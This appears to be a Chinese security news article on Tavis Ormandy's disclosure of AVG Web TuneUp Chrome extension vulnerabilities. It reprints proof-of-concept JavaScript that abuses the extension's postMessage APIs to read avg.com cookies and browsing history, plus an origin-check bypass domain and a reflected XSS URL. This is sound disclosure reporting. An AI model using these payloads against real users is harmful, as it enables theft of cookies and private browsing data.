谷歌浏览器插件曝多个高危漏洞,影响900万用户

安全
今年8月15日, 来自project zero的成员Tavis提交了谷歌浏览器插件 AVG Web TuneUp的多个漏洞,由于该插件活跃用户约900万,所以影响范围非常广。

这个插件添加了很多的api用来操作谷歌浏览器,比如可以轻易的劫持搜索框和新标签页。而由于其安装过程十分复杂,所以能够逃避谷歌恶意软件的检查,特别是能够逃避谷歌浏览器“阻止滥用扩展的API”的检查。

事实上其中的很多api是有问题的,攻击者可以通过构造payload成功盗取用户在avg.com上的cookie,还可以获取用户的浏览记录以及其他的私人数据,甚至有可能成功实施任意命令执行。

攻击手法

Tavis在给厂商的邮件中列举了几种攻击手法:"navigate" API 将会导致一个通用的跨域xss漏洞,attacker.com可以跨域读取访问者的mail.google.com的邮件或者是来自于其他网站的数据。

  1. <script> 
  2.     for (i = 0; i < 256; i++) { 
  3.         window.postMessage({ origin: "web", action: "navigate", data: { 
  4.            url: "javascript:document.location.hostname.endsWith('.avg.com')" 
  5.                 + "?" 
  6.                     + "alert(document.domain + ':' +document.cookie)" 
  7.                 + ":" 
  8.                     + "false"
  9.            tabID: i 
  10.         }}, "*"); 
  11.     } 
  12. </script> 

 

以上代码为Tavis给的poc

通过 window.postMessage(允许跨域通信的javascript api) 不间断的向 AVG: "Web TuneUP”插件发起请求,请求的数据为:

  1. { origin: "web", action: "navigate", data: {url:"javascript:document.location.hostname.endsWith('.avg.com')""?""alert(document.domain + ':' +document.cookie)"":""false",tabID: i}} 

当用户的标签页在访问avg.com网站时,将爆破以.avg.com结尾的网站的当前域名和cookie值。"recently" api将会泄露当前用户的浏览记录

  1. <script> 
  2. window.addEventListener("message", receiveMessage, false); 
  3. window.postMessage({ from: "web", to: "content", method: "recently" }, "*"
  4.   
  5. function receiveMessage(event) 
  6.     if (event.data != undefined && event.data.historyItems != undefined) { 
  7.         var obj = JSON.parse(event.data.historyItems); 
  8.   
  9.         document.write("Here is a list of websites you've been visiting"); 
  10.         document.write("<br>"); 
  11.         for (i in obj) { 
  12.             var d = new Date(obj[i]); 
  13.             document.write("<a href=" + i + ">" + i + "</a> on " + d); 
  14.             document.write("<br>"); 
  15.         } 
  16.     } 
  17. </script> 

 

以上代码为Tavis给的poc

通过window.postMessage向插件的"recently"API发起请求获取当前用户的浏览记录,本地监听事件来获取返回的数据,然后输出数据。

随后厂商对此进行了修复,但是由于修复的不对,又被Tavis绕过了。修复的代码中增加了判断

  1. var match = event.origin.match(/https?:\/\/.*\.avg\.com/i); 
  2.   
  3. if (match ! null { 
  4. ... 

判断来源是不是包含".avg.com",但是这个很容易被绕过。比如https://www.avg.com.www.attacker.com这个域名就能绕过这个限定,继续实施上面提到的两个攻击。又会因为上面的对协议的判断是既支持http又支持https,于是又产生了“中间人攻击”这个问题。

厂商对此又进行了修复,这次限制了域名必须为"mysearch.avg.com"和"webtuneup.avg.com" 。但通过下面这个xss,他又可以对用户数据进行窃取:

http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=%3Cimg%20src=x%20onerror=alert(1)%3E&searchParams=%7B%22lang%22%3A%22en%22%2C%22pid%22%3A%22pid%22%2C%22v%22%3A%22vv%22%7D

责任编辑:何妍 来源: FreeBuf
相关推荐

2023-04-04 22:20:53

2021-04-14 21:40:49

谷歌Chrome浏览器

2011-05-13 18:00:30

2022-01-17 12:46:05

API漏洞应用程序安全

2022-12-08 09:47:29

2015-03-14 10:30:58

谷歌漏洞信息泄露

2015-05-07 14:57:33

浏览器

2022-02-17 16:03:10

Chrome安全漏洞浏览器

2020-12-09 09:32:03

漏洞黑客浏览器

2023-05-08 19:28:11

2015-03-13 19:22:03

2009-10-19 23:25:04

2022-09-05 11:25:22

恶意浏览器Chrome恶意扩展

2010-01-21 11:31:53

火狐Chrome

2022-05-05 14:01:02

DNS高危漏洞uClibc

2013-11-08 09:10:23

2020-06-19 14:55:14

信息泄漏恶意软件攻击

2019-07-21 08:33:53

浏览器扩展插件安全

2015-02-26 13:57:55

2024-10-22 15:29:20

点赞
收藏

51CTO技术栈公众号